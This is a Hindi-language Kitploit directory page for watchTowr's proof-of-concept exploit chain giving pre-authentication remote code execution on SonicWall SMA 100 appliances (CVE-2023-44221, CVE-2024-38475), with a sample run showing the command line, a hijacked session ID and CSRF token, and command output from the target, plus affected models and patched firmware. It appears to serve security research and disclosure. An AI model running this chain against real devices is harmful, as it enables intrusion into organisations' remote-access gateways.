Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
watchTowr-vs-SonicWall-PreAuth-RCE-Chain — SonicWall SMA 100 उपकरणों पर प्री-ऑथेंटिकेशन रिमोट कोड एक्ज़ीक्यूशन के लिए PoC एक्सप्लॉइट श्रृंखला, जो CVE-2023-44221 और CVE-2024-38475 का शोषण करती है। | Kitploit
उपकरण/GitHubGitHub/watchtowrlabs/watchtowr-vs-sonicwall-preauth-rce-chain
एम्बेडेड सिस्टम सुरक्षाभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubwatchtowrlabs/watchtowr-vs-sonicwall-preauth-rce-chain

watchTowr-vs-SonicWall-PreAuth-RCE-Chain

SonicWall SMA 100 उपकरणों पर प्री-ऑथेंटिकेशन रिमोट कोड एक्ज़ीक्यूशन के लिए PoC एक्सप्लॉइट श्रृंखला, जो CVE-2023-44221 और CVE-2024-38475 का शोषण करती है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
19211 साल पहलेअभी तक समीक्षित नहीं

SonicWall SMA 100 PreAuth RCE Chain PoC

SonicWall SMA 100 PreAuth RCE Chain के लिए PoC (CVE-2023-44221, CVE-2024-38475)

तकनीकी विवरण के लिए हमारा ब्लॉग पोस्ट देखें

https://github.com/user-attachments/assets/b157b39c-d7bd-4385-af7a-e465f8fd4a41

PoC कार्रवाई में

root@kitploit:~
python watchTowr-vs-SonicWall-PreAuth-RCE-Chain.py -t https://192.168.8.153/ -c ifconfig
                         __         ___  ___________
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|
                                  \/          \/     \/

        watchTowr-vs-SonicWall-PreAuth-RCE-Chain.py

        (*) SonicWall Pre-Auth RCE Chain

          - Sina Kheirkhah (@SinSinology) of watchTowr (@watchTowrcyber)

        CVEs: [CVE-2023-44221, CVE-2024-38475]

[*] Database downloaded successfully as temp.db
[*] Session ID: eT0Hg7tYutyqs0e2ZuXbnnWfjZ0YGnzteRiu9AlMMVU=
[*] CSRF Token: 4fzPDyqMRiAmYY9M9zJU9CefZDqRyUPZ
[*] Session is valid.
[*] Command executed successfully.
<pre>eth0: flags=4163&lt;UP,BROADCAST,RUNNING,MULTICAST&gt;  mtu 1500
        inet 192.168.8.153  netmask 255.255.255.0  broadcast 192.168.8.255
        inet6 fe80::20c:29ff:fec9:f9e2  prefixlen 64  scopeid 0x20&lt;link&gt;
        ether 00:0c:29:c9:f9:e2  txqueuelen 1000  (Ethernet)
        RX packets 327943  bytes 143863046 (137.1 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 229647  bytes 334022494 (318.5 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73&lt;UP,LOOPBACK,RUNNING&gt;  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10&lt;host&gt;
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 76818  bytes 30267068 (28.8 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 76818  bytes 30267068 (28.8 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

sh: &quot;: command not found

Traceroute6 complete.
</pre>

प्रभावित संस्करण

ये दो कमजोरियाँ SMA 200, SMA 210, SMA 400, SMA 410 और SMA 500v डिवाइसों को प्रभावित करती हैं, और फर्मवेयर संस्करण 10.2.1.14-75sv तथा उसके बाद में इन्हें पैच किया गया है।

watchTowr Labs का अनुसरण करें

नवीनतम सुरक्षा अनुसंधान के लिए watchTowr Labs टीम का अनुसरण करें

  • https://labs.watchtowr.com/
  • https://x.com/watchtowrcyber
टूल डाउनलोड करें